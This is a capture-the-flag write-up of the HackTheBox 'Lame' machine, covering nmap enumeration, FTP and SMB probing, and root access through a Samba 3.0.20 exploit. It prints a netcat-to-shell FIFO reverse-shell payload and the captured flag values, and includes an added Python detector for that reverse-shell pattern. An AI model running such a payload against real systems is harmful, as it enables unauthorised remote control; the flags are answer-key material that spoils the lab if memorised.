Hackthebox – Lame – Writeup


What we know before interacting with the box:

  • Name: LAME
  • IP:
  • Level: Very easy
  • OS: Linux
  • Flag: 2 (User and Root Flag)
  • Common and real world vulnerability. Maybe related to previous Box.
  • Attacker IP:


First, give it an initial nmap enumeration

nmap -sV -A
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
|   OS: Unix (Samba 3.0.20-Debian)
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-08-26T13:12:53-04:00


– Domain: hackthebox.gr

– vsftpd 2.3.4 running on port 21

– SSH 4.7p1 running on port 22

– Ports 139 and 445 serve SMB → this is not the SMB service on Windows but on Linux. The service used here is Samba smbd 3.0.20-Debian

Pentest FTP

As FTP supports anonymous login, I have a go at this FTP connection.

          (kali) ftp

It looks like some filters prevent me from accessing data. Nothing's here.

I searched Google for a vsftpd 2.3.4 exploit.

I tried a Python exploit script for vsftpd, but it did not work.

Pentest SMB

I used smbmap to check for public share.

Well, we can READ and WRITE to tmp. I used smbclient to access this folder but got an error.

I searched Google for this error message and found one solution.

Now smbclient works properly

I checked the files in the tmp folder, but found no useful information.

Exploit Samba 3.0.20

I searched Google for an exploit for Samba version 3.0.20 and found a Python script: macha97/exploit-smb-3.0.20 (GitHub).

This script requires a payload created with msfvenom.

This buf string actually is just a Bash reverse shell:

          (buf) mkfifo /tmp/cewoh; nc 4444 0</tmp/cewoh | /bin/sh >/tmp/cewoh 2>&1; rm /tmp/cewoh
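
Seen from the defending side, this payload has a recognisable shape in process telemetry: a single command creates a FIFO and wires it to both ends of an nc | sh pipeline. The detector below is an added example, not part of the original writeup or of the exploit script; the sample command lines and the 192.0.2.x addresses are constructed, and the function names are hypothetical.

```python
import re
from dataclasses import dataclass

# Constructed command lines as process telemetry (auditd/EDR) might record them.
# Not taken from the box; 192.0.2.x are RFC 5737 documentation addresses.
SAMPLES = [
    "sh -c 'mkfifo /tmp/cewoh; nc 192.0.2.10 4444 0</tmp/cewoh | /bin/sh >/tmp/cewoh 2>&1; rm /tmp/cewoh'",
    "sh -c 'mkfifo /var/run/app.fifo; chmod 600 /var/run/app.fifo'",  # benign FIFO setup
    "nc -z 192.0.2.20 22",                                            # benign port check
    "sh -c 'mkfifo /tmp/q; gzip -c </tmp/q >/backup/out.gz'",         # FIFO read only
]

MKFIFO = re.compile(r"\bmkfifo\s+(?:-\S+\s+)*([^\s;|&']+)")
NETCAT = re.compile(r"(?:^|[\s;|&'/])(?:nc|ncat|netcat)\s")
# A shell that is itself a pipeline stage ("... | /bin/sh"), not the sh -c wrapper.
SHELL_STAGE = re.compile(r"\|\s*(?:/\S+/)?(?:sh|bash|dash|zsh)\b")


@dataclass
class Finding:
    cmdline: str
    fifo: str


def detect_fifo_reverse_shell(cmdline):
    """Flag a command that creates a FIFO and uses it as both stdin and stdout
    of a netcat-to-shell pipeline (the loop used by the payload above)."""
    if not (NETCAT.search(cmdline) and SHELL_STAGE.search(cmdline)):
        return None
    for fifo in MKFIFO.findall(cmdline):
        path = re.escape(fifo) + r"(?![\w./-])"           # do not match /tmp/x2 for /tmp/x
        reads = re.search(r"<\s*" + path, cmdline)         # 0<fifo or <fifo
        writes = re.search(r"(?<!2)>\s*" + path, cmdline)  # >fifo or 1>fifo, not 2>fifo
        if reads and writes:
            return Finding(cmdline, fifo)
    return None


def scan(cmdlines):
    """Return findings for every command line that matches the pattern."""
    return [f for f in map(detect_fifo_reverse_shell, cmdlines) if f]


if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(f"ALERT fifo={hit.fifo} cmd={hit.cmdline}")
```

The match is a heuristic over recorded command lines, so it depends on telemetry that captures the full command string, and it only covers the netcat-into-shell ordering shown in this payload.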

The complete exploit script is like

Use python3 to run it

And I got shell from netcat listener

Great, my shell is already root, so I can get the user flag and the root flag at once. There are several users in /home.

I searched for .txt files to quickly find the user flag.

(user flag) 83f38774483206d7c54299b9dd2e3a89

And the root flag is at /root/root.txt as usual

(root flag) 3bc8b537695679e5eb8cb0aeb9e2cb13

Lessons learned

  • The SMB service (ports 139 and 445 open) also exists on Linux.
  • Samba 3.0.20 is vulnerable to a critical bug that can lead to RCE as root.





